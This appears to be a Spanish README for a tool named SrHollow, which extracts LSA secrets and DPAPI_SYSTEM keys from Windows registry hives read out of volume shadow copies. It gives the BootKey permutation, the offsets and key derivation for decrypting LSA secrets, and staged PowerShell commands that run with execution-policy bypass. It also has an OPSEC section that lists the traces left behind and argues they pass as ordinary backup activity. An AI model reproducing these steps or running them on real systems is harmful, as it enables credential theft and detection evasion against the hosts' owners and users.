
Extrae secretos LSA y claves DPAPI de los hives del registro de Windows mediante copias de sombra VSS existentes o recién creadas, con un parser regf en línea y descifrado AES-256.
Extracción de secretos LSA, reutilización de una copia de sombra VSS preexistente + parser regf en línea + descifrado AES-256 de LSA mediante bcrypt.dll.
\GLOBAL?? mediante NtOpenDirectoryObject + NtQueryDirectoryObject. Elegir el HarddiskVolumeShadowCopyN con el número más alto.SRSetRestorePointW(BEGIN_SYSTEM_CHANGE, DEVICE_DRIVER_INSTALL) desde SrClient.dll.SeBackupPrivilege en el token actual (AdjustTokenPrivileges).CreateFileW("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\config\{SECURITY,SYSTEM}", FILE_FLAG_BACKUP_SEMANTICS) y leer a byte[].regf en línea que analiza el hive: bloque base, tipos de celda nk/vk/lf/lh/li/ri/db/sk. Diseño de KeyNode, flags @0x02, lista de subclaves @0x1C, lista de valores @0x28, clave de seguridad @0x2C, offset de clase @0x30, longitud del nombre u16 @0x48, longitud de clase u16 @0x4A (esto fue un bug en la primera pasada — la propia documentación de Microsoft es ambigua aquí), nombre @0x4C.Class de ControlSet00N\Control\Lsa\{JD, Skew1, GBG, Data} → 16 bytes en bruto → permutar con [8,5,4,2,11,9,13,3,0,6,1,12,14,10,15,7].Policy\PolEKList\(default) (172 bytes): salt = bytes[0x1C..0x3C]; tmpKey = SHA-256(BootKey || salt * 1000); pt = AES-256-CBC-decrypt(bytes[0x3C..], tmpKey, IV=0); clave LSA = pt[68..100].Policy\Secrets\<name>\CurrVal\(default): mismo diseño, estiramiento de salt con la clave LSA en lugar de BootKey.DPAPI_SYSTEM: bytes[4..24] = MachineKey, bytes[24..44] = UserKey. Estos descifran cada clave maestra DPAPI con alcance SYSTEM en el host.SrHollow/
├── README.md <- you are here
├── src/
│ └── SrHollow.cs <- inline regf parser + LSA AES crypto (~350 LOC, single file)
└── stages/
├── Stage1-Recon.ps1 <- read-only shadow enumeration
├── Stage1b-ReadShadowHives.ps1 <- auto-detect / auto-create shadow + slurp hives
├── Stage2-Decrypt.ps1 <- BootKey + LSA key + all secrets
└── Stage3-Report.ps1 <- formatted operator report with OPSEC footprint
src/SrHollow.cs tiene cero dependencias más allá de System.Security.Cryptography (que a su vez actúa como proxy hacia bcrypt.dll). Se compila tal cual mediante Add-Type o csc.exe.
PowerShell elevado
# 1. Read-only recon, see what shadows already exist
powershell.exe -ep bypass -File .\stages\Stage1-Recon.ps1
# 2. Extract SECURITY + SYSTEM from the newest existing shadow
# (creates one via SRSetRestorePointW if none exist)
powershell.exe -ep bypass -File .\stages\Stage1b-ReadShadowHives.ps1
# 3. Derive BootKey + LSA key + decrypt every secret
powershell.exe -ep bypass -File .\stages\Stage2-Decrypt.ps1
# 4. (Optional) formatted operator report
powershell.exe -ep bypass -File .\stages\Stage3-Report.ps1
Requiere: admin local (para SeBackupPrivilege), un servicio Volume Shadow Copy que esté en ejecución o pueda iniciarse (predeterminado en Windows 10/11).
Señales atribuibles que quedan cuando una sombra ya existe:
CreateFileW sobre \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\...AdjustTokenPrivileges habilitando SeBackupPrivilegeSHA-256 + AES-CBC estándar mediante bcrypt.dll (userland, nada destacable)Este es el mismo perfil de apertura de archivos que la mayoría de los agentes de backup legítimos.